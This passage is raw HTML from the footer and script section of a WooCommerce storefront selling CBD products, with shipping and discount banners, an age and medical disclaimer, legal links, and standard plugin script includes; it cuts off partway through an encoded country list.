data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Follow us: @cbd2go.ca</h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-1d9144d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1d9144d" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-d102c58" data-id="d102c58" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-d1155f2 elementor-widget elementor-widget-heading" data-id="d1155f2" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">FREE SHIPPING</h5> </div> </div> <div class="elementor-element elementor-element-d0280d8 elementor-widget elementor-widget-heading" data-id="d0280d8" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <p class="elementor-heading-title elementor-size-default">On all orders over $150 before tax</p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-edfce26" data-id="edfce26" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-5d478d1 elementor-widget elementor-widget-heading" data-id="5d478d1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">10% DISCOUNT</h5> </div> </div> <div class="elementor-element elementor-element-bc219a5 elementor-widget elementor-widget-heading" data-id="bc219a5" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <p class="elementor-heading-title elementor-size-default">10% Discount for first-time buyers</p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-af8195b" data-id="af8195b" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-00a9786 elementor-widget elementor-widget-heading" data-id="00a9786" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-default">SECURE PAYMENT</h5> </div> </div> <div class="elementor-element elementor-element-8ae955f elementor-widget elementor-widget-image" data-id="8ae955f" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="219" height="32" src="https://shopopenmarket.com/wp-content/uploads/payments.jpg" class="attachment-large size-large wp-image-264" alt="" loading="lazy" /> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-5dd1129 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5dd1129" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-ec08cda" data-id="ec08cda" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-0f8ada8 elementor-widget elementor-widget-heading" data-id="0f8ada8" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <p class="elementor-heading-title elementor-size-default">Disclaimer: All products are not for use by or sale to persons under the age of 19. It should not be used if you are pregnant or nursing. Consult with a physician before use if you have a serious medical condition or use prescription medications. A Doctor’s advice should be sought before using this and any supplemental dietary product. All trademarks and copyrights are property of their respective owners and are not affiliated with nor do they endorse this product. By using this site, you agree to follow the Privacy Policy and all Terms & Conditions printed on this site. Void Where Prohibited by Law. While we work to ensure that product information is correct, on occasion manufacturers may alter their ingredient lists. Actual product packaging and materials may contain more and/or different information than that shown on our Web site. We recommend that you do not solely rely on the information presented and that you always read labels, warnings, and directions before using or consuming a product. For additional information about a product, please contact the manufacturer. Content on this site is for reference purposes and is not intended to substitute for advice given by a physician, pharmacist, or other licensed health-care professional. You should not use this information as self-diagnosis or for treating a health problem or disease. Information and statements regarding dietary supplements have not been evaluated by the Health Canada or Food and Drug Administration and are not intended to diagnose, treat, cure, or prevent any disease or health condition. CBD2GO.ca assumes no liability for inaccuracies or misstatements about products.</p> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> </div> </div> </div> <footer itemtype="https://schema.org/WPFooter" itemscope="itemscope" id="colophon" role="contentinfo"> <div class='footer-width-fixer'> <div data-elementor-type="wp-post" data-elementor-id="669" class="elementor elementor-669"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section class="elementor-section elementor-top-section elementor-element elementor-element-5fd56ffc elementor-section-stretched elementor-section-full_width elementor-section-height-default elementor-section-height-default" data-id="5fd56ffc" data-element_type="section" data-settings="{"background_background":"classic","stretch_section":"section-stretched"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4a145cf2" data-id="4a145cf2" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-26d4aefe elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="26d4aefe" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-38b93f86" data-id="38b93f86" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-2aa8fc5e elementor-widget elementor-widget-image" data-id="2aa8fc5e" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="325" height="379" src="https://shopopenmarket.com/wp-content/uploads/boodCBD.png" class="attachment-full size-full wp-image-354" alt="" loading="lazy" /> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-28138aab" data-id="28138aab" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-1aa42238 elementor-widget elementor-widget-heading" data-id="1aa42238" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">THE #1 RESOURCE GUIDE FOR CBD USERS</h3> </div> </div> <div class="elementor-element elementor-element-5418423f elementor-widget elementor-widget-heading" data-id="5418423f" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <p class="elementor-heading-title elementor-size-default">We’ve taken our industry knowledge from the past 5 years and condensed it into one easy to read, actionable book.</p> </div> </div> <div class="elementor-element elementor-element-5ac511c6 elementor-align-center elementor-widget elementor-widget-button" data-id="5ac511c6" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="#" class="elementor-button-link elementor-button elementor-size-md" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">DOWNLOAD THE CBD USER GUIDE</span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-5eca63d8 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5eca63d8" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-2274d628" data-id="2274d628" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-69fc6fb7 elementor-widget elementor-widget-image" data-id="69fc6fb7" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <a href="http://shopopenmarket.com/"> <img width="648" height="199" src="https://shopopenmarket.com/wp-content/uploads/CBDlogo.png" class="attachment-full size-full wp-image-365" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBDlogo.png 648w, https://shopopenmarket.com/wp-content/uploads/CBDlogo-416x128.png 416w" sizes="(max-width: 648px) 100vw, 648px" /> </a> </div> </div> </div> <div class="elementor-element elementor-element-754b6162 elementor-widget elementor-widget-text-editor" data-id="754b6162" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"> 75 queen wharf road<br> Toronto Ontario, M5v2j8<br> Canada </div> </div> </div> <div class="elementor-element elementor-element-2e49f66c e-grid-align-left e-grid-align-mobile-center elementor-shape-rounded elementor-grid-0 elementor-widget elementor-widget-social-icons" data-id="2e49f66c" data-element_type="widget" data-widget_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper elementor-grid"> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-3e2e897" href="#" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fab fa-facebook"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-repeater-item-878ce3a" href="#" target="_blank"> <span class="elementor-screen-only">Twitter</span> <i class="fab fa-twitter"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin elementor-repeater-item-4a70843" href="#" target="_blank"> <span class="elementor-screen-only">Linkedin</span> <i class="fab fa-linkedin"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-instagram elementor-repeater-item-e63fa63" href="http://3" target="_blank"> <span class="elementor-screen-only">Instagram</span> <i class="fab fa-instagram"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-7d082ed" href="http://3" target="_blank"> <span class="elementor-screen-only">Youtube</span> <i class="fab fa-youtube"></i> </a> </span> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-11dad48a" data-id="11dad48a" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-12ed0f0c elementor-widget elementor-widget-heading" data-id="12ed0f0c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">LEGAL INFORMATION</h2> </div> </div> <div class="elementor-element elementor-element-6114fac5 elementor-mobile-align-center elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="6114fac5" data-element_type="widget" data-widget_type="icon-list.default"> <div class="elementor-widget-container"> <ul class="elementor-icon-list-items"> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-text">Terms and Conditions </span> </a> </li> <li class="elementor-icon-list-item"> <a href="http://shopopenmarket.com/faq/"> <span class="elementor-icon-list-text"> Privacy Policy</span> </a> </li> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-text">Refund Policy</span> </a> </li> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-text">Medical Disclaimer</span> </a> </li> </ul> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-49823a78" data-id="49823a78" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-6f516563 elementor-widget elementor-widget-heading" data-id="6f516563" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">USEFUL LINKS</h2> </div> </div> <div class="elementor-element elementor-element-2fe455c elementor-mobile-align-center elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="2fe455c" data-element_type="widget" data-widget_type="icon-list.default"> <div class="elementor-widget-container"> <ul class="elementor-icon-list-items"> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-text">Terms and Conditions </span> </a> </li> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-text"> Privacy Policy</span> </a> </li> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-text">Refund Policy</span> </a> </li> <li class="elementor-icon-list-item"> <a href="#"> <span class="elementor-icon-list-text">Medical Disclaimer</span> </a> </li> </ul> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-25646d1a" data-id="25646d1a" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-3eab85d1 elementor-widget elementor-widget-heading" data-id="3eab85d1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">NEWSLETTER</h2> </div> </div> <div class="elementor-element elementor-element-6cd3d630 elementor-widget elementor-widget-text-editor" data-id="6cd3d630" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"> <p><input style="width: 100%; border-radius:0; border:none; border-bottom:1px solid #a6a6a6;" type="email" placeholder="Enter Your Email Address" /> </p> </div> </div> </div> <div class="elementor-element elementor-element-4cfa56f9 elementor-align-justify elementor-widget elementor-widget-button" data-id="4cfa56f9" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="#" class="elementor-button-link elementor-button elementor-size-sm" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">subscribe</span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-31278615 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="31278615" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-c5e780f" data-id="c5e780f" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-11e8d2c8 elementor-widget elementor-widget-heading" data-id="11e8d2c8" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <p class="elementor-heading-title elementor-size-default">© openmarket 2020 </p> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </footer> </div><!-- #page --> <span id="scrollup-master" class="scrollup-button" title="Scroll Back to Top" data-distance="300" > <svg xmlns="http://www.w3.org/2000/svg" class="scrollup-svg-icon" width="32" height="32" viewBox="0 0 24 24"><path d="M12 2q0.4 0 0.7 0.3l7 7q0.3 0.3 0.3 0.7 0 0.4-0.3 0.7t-0.7 0.3q-0.4 0-0.7-0.3l-5.3-5.3v15.6q0 0.4-0.3 0.7t-0.7 0.3-0.7-0.3-0.3-0.7v-15.6l-5.3 5.3q-0.3 0.3-0.7 0.3-0.4 0-0.7-0.3t-0.3-0.7q0-0.4 0.3-0.7l7-7q0.3-0.3 0.7-0.3z"></path></svg> </span> <div class="woocommerce" id="htwlquick-viewmodal"><div class="htwl-modal-dialog product"><div class="htwl-modal-content"><button type="button" class="htcloseqv"><span class="sli sli-close"><span class="woolentor-placeholder-remove">X</span></span></button><div class="htwl-modal-body"></div></div></div></div> <script type="text/javascript"> (function () { var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; })(); </script> <script type="text/template" id="tmpl-variation-template"> <div class="woocommerce-variation-description">{{{ data.variation.variation_description }}}</div> <div class="woocommerce-variation-price">{{{ data.variation.price_html }}}</div> <div class="woocommerce-variation-availability">{{{ data.variation.availability_html }}}</div> </script> <script type="text/template" id="tmpl-unavailable-variation-template"> <p>Sorry, this product is unavailable. Please choose a different combination.</p> </script> <link rel='stylesheet' id='woocommerce-currency-switcher-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.4.0' type='text/css' media='all' /> <link rel='stylesheet' id='woof_tooltip-css-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bundle.min.css?ver=1.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='woof_tooltip-css-noir-css' href='https://shopopenmarket.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipster/sideTip/themes/tooltipster-sideTip-noir.min.css?ver=1.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-regular-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.15.3' type='text/css' media='all' /> <link rel='stylesheet' id='e-animations-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.11.5' type='text/css' media='all' /> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/woolentor-blocks/src/assets/js/script.js?ver=2.5.7' id='woolentor-block-main-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.4' id='swv-js'></script> <script type='text/javascript' id='contact-form-7-js-extra'> /* <![CDATA[ */ var wpcf7 = {"api":{"root":"https:\/\/shopopenmarket.com\/wp-json\/","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.4' id='contact-form-7-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.7.5.1' id='jquery-blockui-js'></script> <script type='text/javascript' id='wc-add-to-cart-js-extra'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/shopopenmarket.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.5.1' id='wc-add-to-cart-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.7.5.1' id='js-cookie-js'></script> <script type='text/javascript' id='woocommerce-js-extra'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.5.1' id='woocommerce-js'></script> <script type='text/javascript' id='wc-cart-fragments-js-extra'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_00d99da7a967cace916567b05d967aa6","fragment_name":"wc_fragments_00d99da7a967cace916567b05d967aa6","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=7.5.1' id='wc-cart-fragments-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/js/slick.min.js?ver=2.5.7' id='slick-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/js/accordion.min.js?ver=2.5.7' id='woolentor-accordion-min-js'></script> <script type='text/javascript' id='mailchimp-woocommerce-js-extra'> /* <![CDATA[ */ var mailchimp_public_data = {"site_url":"https:\/\/shopopenmarket.com","ajax_url":"https:\/\/shopopenmarket.com\/wp-admin\/admin-ajax.php","disable_carts":"","subscribers_only":"","language":"en","allowed_to_set_cookies":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-public.min.js?ver=2.8.1.01' id='mailchimp-woocommerce-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementskit-lite/libs/framework/assets/js/frontend-script.js?ver=2.8.5' id='elementskit-framework-js-frontend-js'></script> <script type='text/javascript' id='elementskit-framework-js-frontend-js-after'> var elementskit = { resturl: 'https://shopopenmarket.com/wp-json/elementskit/v1/', } </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/widget-scripts.js?ver=2.8.5' id='ekit-widget-scripts-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2' id='jquery-ui-core-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.2' id='jquery-ui-mouse-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.13.2' id='jquery-ui-slider-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touch-punch.min.js?ver=7.5.1' id='wc-jquery-ui-touchpunch-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.4.0' id='wc-price-slider_33-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5' id='wp-hooks-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae' id='wp-i18n-js'></script> <script type='text/javascript' id='wp-i18n-js-after'> wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } ); </script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/url.min.js?ver=bb0ef862199bcae73aa7' id='wp-url-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/dist/api-fetch.min.js?ver=bc0029ca2c943aec5311' id='wp-api-fetch-js'></script> <script type='text/javascript' id='wp-api-fetch-js-after'> wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "https://shopopenmarket.com/wp-json/" ) ); wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "9a261d11a1" ); wp.apiFetch.use( wp.apiFetch.nonceMiddleware ); wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware ); wp.apiFetch.nonceEndpoint = "https://shopopenmarket.com/wp-admin/admin-ajax.php?action=rest-nonce"; </script> <script type='text/javascript' id='wc-settings-js-before'> var wcSettings = wcSettings || JSON.parse( decodeURIComponent( '%7B%22adminUrl%22%3A%22https%3A%5C%2F%5C%2Fshopopenmarket.com%5C%2Fwp-admin%5C%2F%22%2C%22countries%22%3A%7B%22AF%22%3A%22Afghanistan%22%2C%22AX%22%3A%22%5Cu00c5land%20Islands%22%2C%22AL%22%3A%22Albania%22%2C%22DZ%22%3A%22Algeria%22%2C%22AS%22%3A%22American%20Samoa%22%2C%22AD%22%3A%22Andorra%22%2C%22AO%22%3A%22Angola%22%2C%22AI%22%3A%22Anguilla%22%2C%22AQ%22%3A%22Antarctica%22%2C%22AG%22%3A%22Antigua%20and%20Barbuda%22%2C%22AR%22%3A%22Argentina%22%2C%22AM%22%3A%22Armenia%22%2C%22AW%22%3A%22Aruba%22%2C%22AU%22%3A%22Australia%22%2C%22AT%22%3A%22Austria%22%2C%22AZ%22%3A%22Azerbaijan%22%2C%22BS%22%3A%22Bahamas%22%2C%22BH%22%3A%22Bahrain%22%2C%22BD%22%3A%22Bangladesh%22%2C%22BB%22%3A%22Barbados%22%2C%22BY%22%3A%22Belarus%22%2C%22PW%22%3A%22Belau%22%2C%22BE%22%3A%22Belgium%22%2C%22BZ%22%3A%22Belize%22%2C%22BJ%22%3A%22Benin%22%2C%22BM%22%3A%22Bermuda%22%2C%22BT%22%3A%22Bhutan%22%2C%22BO%22%3A%22Bolivia%22%2C%22BQ%22%3A%22Bonaire%2C%20Saint%20Eustatius%20and%20Saba%22%2C%22BA%22%3A%22Bosnia%20and%20Herzegovina%22%2C%22BW%22%3A%22Botswana%22%2C%22BV%22%3A%22Bouvet%20Island%22%2C%22BR%22%3A%22Brazil%22%2C%22IO%22%3A%22British%20Indian%20Ocean%20Territory%22%2C%22BN%22%3A%22Brunei%22%2C%22BG%22%3A%22Bulgaria%22%2C%22BF%22%3A%22Burkina%20Faso%22%2C%22BI%22%3A%22Burundi%22%2C%22KH%22%3A%22Cambodia%22%2C%22CM%22%3A%22Cameroon%22%2C%22CA%22%3A%22Canada%22%2C%22CV%22%3A%22Cape%20Verde%22%2C%22KY%22%3A%22Cayman%20Islands%22%2C%22CF%22%3A%22Central%20African%20Republic%22%2C%22TD%22%3A%22Chad%22%2C%22CL%22%3A%22Chile%22%2C%22CN%22%3A%22China%22%2C%22CX%22%3A%22Christmas%20Island%22%2C%22CC%22%3A%22Cocos%20%28Keeling%29%20Islands%22%2C%22CO%22%3A%22Colombia%22%2C%22KM%22%3A%22Comoros%22%2C%22CG%22%3A%22Congo%20%28Brazzaville%29%22%2C%22CD%22%3A%22Congo%20%28Kinshasa%29%22%2C%22CK%22%3A%22Cook%20Islands%22%2C%22CR%22%3A%22Costa%20Rica%22%2C%22HR%22%3A%22Croatia%22%2C%22CU%22%3A%22Cuba%22%2C%22CW%22%3A%22Cura%26ccedil%3Bao%22%2C%22CY%22%3A%22Cyprus%22%2C%22CZ%22%3A%22Czech%20Republic%22%2C%22DK%22%3A%22Denmark%22%2C%22DJ%22%3A%22Djibouti%22%2C%22DM%22%3A%22Dominica%22%2C%22DO%22%3A%22Dominican%20Republic%22%2C%22EC%22%3A%22Ecuador%22%2C%22EG%22%3A%22Egypt%22%2C%22SV%22%3A%22El%20Salvador%22%2C%22GQ%22%3A%22Equatorial%20Guinea%22%2C%22ER%22%3A%22Eritrea%22%2C%22EE%22%3A%22Estonia%22%2C%22SZ%22%3A%22Eswatini%22%2C%22ET%22%3A%22Ethiopia%22%2C%22FK%22%3A%22Falkland%20Islands%22%2C%22FO%22%3A%22Faroe%20Islands%22%2C%22FJ%22%3A%22Fiji%22%2C%22FI%22%3A%22Finland%22%2C%22FR%22%3A%22France%22%2C%22GF%22%3A%22French%20Guiana%22%2C%22PF%22%3A%22French%20Polynesia%22%2C%22TF%22%3A%22French%20Southern%20Territories%22%2C%22GA%22%3A%22Gabon%22%2C%22GM%22%3A%22Gambia%22%2C%22GE%22%3A%22Georgia%22%2C%22DE%22%3A%22Germany%22%2C%22GH%22%3A%22Ghana%22%2C%22GI%22%3A%22Gibraltar%22%2C%22GR%22%3A%22Greece%22%2C%22GL%22%3A%22Greenland%22%2C%22GD%22%3A%22Grenada%22%2C%22GP%22%3A%22Guadeloupe%22%2C%22GU%22%3A%22Guam%22%2C%22GT%22%3A%22Guatemala%22%2C%22GG%22%3A%22Guernsey%22%2C%22GN%22%3A%22Guinea%22%2C%22GW%22%3A%22Guinea-Bissau%22%2C%22GY%22%3A%22Guyana%22%2C%22HT%22%3A%22Haiti%22%2C%22HM%22%3A%22Heard%20Island%20and%20McDonald%20Islands%22%2C%22HN%22%3A%22Honduras%22%2C%22HK%22%3A%22Hong%20Kong%22%2C%22HU%22%3A%22Hungary%22%2C%22IS%22%3A%22Iceland%22%2C%22IN%22%3A%22India%22%2C%22ID%22%3A%22Indonesia%22%2C%22IR%22%3A%22Iran%22%2C%22IQ%22%3A%22Iraq%22%2C%22IE%22%3A%22Ireland%22%2C%22IM%22%3A%22Isle%20of%20Man%22%2C%22IL%22%3A%22Israel%22%2C%22IT%22%3A%22Italy%22%2C%22CI%22%3A%22Ivory%20Coast%22%2C%22JM%22%3A%22Jamaica%22%2C%22JP%22%3A%22Japan%22%2C%22JE%22%3A%22Jersey%22%2C%22JO%22%3A%22Jordan%22%2C%22KZ%22%3A%22Kazakhstan%22%2C%22KE%22%3A%22Kenya%22%2C%22KI%22%3A%22Kiribati%22%2C%22KW%22%3A%22Kuwait%22%2C%22KG%22%3A%22Kyrgyzstan%22%2C%22LA%22%3A%22Laos%22%2C%22LV%22%3A%22Latvia%22%2C%22LB%22%3A%22Lebanon%22%2C%22LS%22%3A%22Lesotho%22%2C%22LR%22%3A%22Liberia%22%2C%22LY%22%3A%22Libya%22%2C%22LI%22%3A%22Liechtenstein%22%2C%22LT%22%3A%22Lithuania%22%2C%22LU%22%3A%22Luxembourg%22%2C%22MO%22%3A%22Macao%22%2C%22MG%22%3A%22Madagascar%22%2C%22MW%22%3A%22Malawi%22%2C%22MY%22%3A%22Malaysia%22%2C%22MV%22%3A%22Maldives%22%2C%22ML%22%3A%22Mali%22%2C%22MT%22%3A%22Malta%22%2C%22MH%22%3A%22Marshall%20Islands%22%2C%22MQ%22%3A%22Martinique%22%2C%22MR%22%3A%22Mauritania%22%2C%22MU%22%3A%22Mauritius%22%2C%22YT%22%3A%22Mayotte%22%2C%22MX%22%3A%22Mexico%22%2C%22FM%22%3A%22Micronesia%22%2C%22MD%22%3A%22Moldova%22%2C%22MC%22%3A%22Monaco%22%2C%22MN%22%3A%22Mongolia%22%2C%22ME%22%3A%22Montenegro%22%2C%22MS%22%3A%22Montserrat%22%2C%22MA%22%3A%22Morocco%22%2C%22MZ%22%3A%22Mozambique%22%2C%22MM%22%3A%22Myanmar%22%2C%22NA%2